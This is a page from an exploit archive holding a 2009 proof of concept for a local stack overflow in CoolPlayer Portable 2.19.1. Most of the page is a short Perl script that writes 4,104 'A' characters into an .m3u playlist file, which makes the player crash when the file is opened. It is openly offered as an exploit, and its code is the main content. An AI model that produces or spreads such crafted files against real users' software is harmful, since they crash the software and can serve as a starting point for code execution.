[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CoolPlayer Portable 2.19.1 (.m3u File) Local Stack Overflow PoC
# Published : 2009-04-20
# Author : GoLd_M
# Previous Title : 1by1 1.67 (.m3u File) Local Stack Overflow PoC
# Next Title : Groovy Media Player 1.1.0 (.m3u File) Local Stack Overflow PoC


# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ##  ##
# #  CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC   # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ### ## ## ## ## 
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created n";
print "Thanx Tryag.Com";

# www.Syue.com [2009-04-20]